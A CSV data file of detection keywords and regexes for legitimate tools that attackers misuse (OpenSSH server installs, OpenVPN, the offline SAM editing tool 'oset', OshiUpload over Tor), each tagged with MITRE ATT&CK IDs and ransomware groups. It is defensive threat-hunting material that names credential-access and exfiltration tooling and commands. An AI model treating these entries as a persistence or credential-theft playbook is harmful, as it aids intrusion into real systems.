"*Add-WindowsCapability -Online -Name OpenSSH.Server*",".{0,1000}Add\-WindowsCapability\s\-Online\s\-Name\sOpenSSH\.Server.{0,1000}","greyware_tool_keyword","Openssh","Install OpenSSH Server service on windows - abused by attacker for persistant control","T1021.004 - T1574.001 - T1574.010","TA0003 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell#install-openssh-for-windows","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*Import-Module *\OpenSSHUtils*",".{0,1000}Import\-Module\s.{0,1000}\\OpenSSHUtils.{0,1000}","greyware_tool_keyword","Openssh","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*\\pipe\\openssh-ssh-agent*",".{0,1000}\\\\pipe\\\\openssh\-ssh\-agent.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","#namedpipe","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*\OpenSSHTestTasks\*",".{0,1000}\\OpenSSHTestTasks\\.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*\pipe\openssh-ssh-agent*",".{0,1000}\\pipe\\openssh\-ssh\-agent.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","#namedpipe","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*\Software\OpenSSH\DefaultShell*",".{0,1000}\\Software\\OpenSSH\\DefaultShell.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*install-sshd.ps1*",".{0,1000}install\-sshd\.ps1.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*net start ssh-agent*",".{0,1000}net\sstart\sssh\-agent.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*New-Service -Name sshd*",".{0,1000}New\-Service\s\-Name\ssshd.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z"
"*""-----BEGIN OpenVPN Static key*",".{0,1000}\""\-\-\-\-\-BEGIN\sOpenVPN\sStatic\skey.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*/openvpn.exe*",".{0,1000}\/openvpn\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","1","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\bin\tapinstall.exe*",".{0,1000}\\bin\\tapinstall\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\Licenses\OpenVPN.txt*",".{0,1000}\\Licenses\\OpenVPN\.txt.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\openvpn.exe*",".{0,1000}\\openvpn\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\Program Files\TAP-Windows\*",".{0,1000}\\Program\sFiles\\TAP\-Windows\\.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\Root\InventoryApplicationFile\tap-windows*",".{0,1000}\\Root\\InventoryApplicationFile\\tap\-windows.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\SOFTWARE\TAP-Windows*",".{0,1000}\\SOFTWARE\\TAP\-Windows.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*\tap-windows-*.exe*",".{0,1000}\\tap\-windows\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*>the openvpn project<*",".{0,1000}\>the\sopenvpn\sproject\<.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071  - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"* OfflineSamTool.h*",".{0,1000}\sOfflineSamTool\.h.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/OfflineSamTool.exe*",".{0,1000}\/OfflineSamTool\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/oset.exe*",".{0,1000}\/oset\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/oset.zip*",".{0,1000}\/oset\.zip.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\OfflineSamTool.exe*",".{0,1000}\\OfflineSamTool\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\OfflineSamTool.h*",".{0,1000}\\OfflineSamTool\.h.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\oset.exe*",".{0,1000}\\oset\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\oset.zip*",".{0,1000}\\oset\.zip.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Root\InventoryApplicationFile\offlinesamtool*",".{0,1000}\\Root\\InventoryApplicationFile\\offlinesamtool.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Open Source Developer, Grzegorz Tworek<*",".{0,1000}\>Open\sSource\sDeveloper,\sGrzegorz\sTworek\<.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#signature","N/A","10","10","N/A","N/A","N/A","N/A"
"*03a3b39dd1b9bfb7421e4ba555ca9669b0e3ca7d993ce921d249493aee23b484*",".{0,1000}03a3b39dd1b9bfb7421e4ba555ca9669b0e3ca7d993ce921d249493aee23b484.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*5f87b4ab00f09c64f4d30fcfbf19e9e6945971c74d28370c720e52b83f7decf3*",".{0,1000}5f87b4ab00f09c64f4d30fcfbf19e9e6945971c74d28370c720e52b83f7decf3.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*62440D3B8BE22B9353AC1374CC6ED1FAF4476908FE6D8E9FBD3AA62004EFEF3E*",".{0,1000}62440D3B8BE22B9353AC1374CC6ED1FAF4476908FE6D8E9FBD3AA62004EFEF3E.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","manually compiled","10","10","N/A","N/A","N/A","N/A"
"*66092d1e08e55e35b60dc348f2f59d69c0768a09ce411a50fc0d161bfab3303d*",".{0,1000}66092d1e08e55e35b60dc348f2f59d69c0768a09ce411a50fc0d161bfab3303d.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*776b64a95ccc334446805d680288c7ac35f1e938ee43115c1911f1c2fed27312*",".{0,1000}776b64a95ccc334446805d680288c7ac35f1e938ee43115c1911f1c2fed27312.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*a5e57662131399ad586e4b5c4a942bc9029104331953fdbdbfd6e8a0cdad9ccc*",".{0,1000}a5e57662131399ad586e4b5c4a942bc9029104331953fdbdbfd6e8a0cdad9ccc.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*b10cfda1-f24f-441b-8f43-80cb93e786ec*",".{0,1000}b10cfda1\-f24f\-441b\-8f43\-80cb93e786ec.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#GUIDproject","N/A","10","10","N/A","N/A","N/A","N/A"
"*C50B26839FCDA18B4DB6560EB826E94C*",".{0,1000}C50B26839FCDA18B4DB6560EB826E94C.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#imphash","N/A","10","10","N/A","N/A","N/A","N/A"
"*Cannot enumerate SAM objects*",".{0,1000}Cannot\senumerate\sSAM\sobjects.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Error converting offlinesam path*",".{0,1000}Error\sconverting\sofflinesam\spath.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*f14052ce01a373effaf1c74eeed9ccda8ac4f6cf3407727d4a5871df9f195f57*",".{0,1000}f14052ce01a373effaf1c74eeed9ccda8ac4f6cf3407727d4a5871df9f195f57.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*f9ac9d3510fb8c2a50b03605454263af27cf68ef4f27458c03b12607a0f8ebd3*",".{0,1000}f9ac9d3510fb8c2a50b03605454263af27cf68ef4f27458c03b12607a0f8ebd3.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*Offline SAM Editing Tool - Changed*",".{0,1000}Offline\sSAM\sEditing\sTool\s\-\sChanged.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Offline SAM Editing Tool*",".{0,1000}Offline\sSAM\sEditing\sTool.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Offline SAM loaded successfully*",".{0,1000}Offline\sSAM\sloaded\ssuccessfully.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Offline SAM Tool\r\nUse with caution!*",".{0,1000}Offline\sSAM\sTool\\r\\nUse\swith\scaution!.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Open Source Developer, Grzegorz Tworek*",".{0,1000}Open\sSource\sDeveloper,\sGrzegorz\sTworek.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg.exe query hklm ^| findstr /i \\OFFLINE'*",".{0,1000}reg\.exe\squery\shklm\s\^\|\sfindstr\s\/i\s\\\\OFFLINE\'.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg.exe query hklm ^| findstr /i \OFFLINE*",".{0,1000}reg\.exe\squery\shklm\s\^\|\sfindstr\s\/i\s\\OFFLINE.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineAddMemberToAlias*",".{0,1000}SamOfflineAddMemberToAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineCloseHandle*",".{0,1000}SamOfflineCloseHandle.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineConnect*",".{0,1000}SamOfflineConnect.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineCreateAliasInDomain*",".{0,1000}SamOfflineCreateAliasInDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineCreateUserInDomain*",".{0,1000}SamOfflineCreateUserInDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineDeleteAlias*",".{0,1000}SamOfflineDeleteAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineDeleteUser*",".{0,1000}SamOfflineDeleteUser.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineEnumerateAliasesInDomain*",".{0,1000}SamOfflineEnumerateAliasesInDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineEnumerateDomainsInSamServer*",".{0,1000}SamOfflineEnumerateDomainsInSamServer.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineEnumerateUsersInDomain2*",".{0,1000}SamOfflineEnumerateUsersInDomain2.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineGetMembersInAlias*",".{0,1000}SamOfflineGetMembersInAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineLookupDomainInSamServer*",".{0,1000}SamOfflineLookupDomainInSamServer.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineOpenDomain*",".{0,1000}SamOfflineOpenDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineOpenUser*",".{0,1000}SamOfflineOpenUser.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineQueryInformationAlias*",".{0,1000}SamOfflineQueryInformationAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineQueryInformationUser*",".{0,1000}SamOfflineQueryInformationUser.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineRemoveMemberFromAlias*",".{0,1000}SamOfflineRemoveMemberFromAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineRidToSid*",".{0,1000}SamOfflineRidToSid.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SamOfflineSetInformationAlias*",".{0,1000}SamOfflineSetInformationAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*stderr.pl/oset*",".{0,1000}stderr\.pl\/oset.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to  access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* oshi.at *",".{0,1000}\soshi\.at\s.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"* --socks5-hostname 127.0.0.1:9050*",".{0,1000}\s\-\-socks5\-hostname\s127\.0\.0\.1\:9050.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
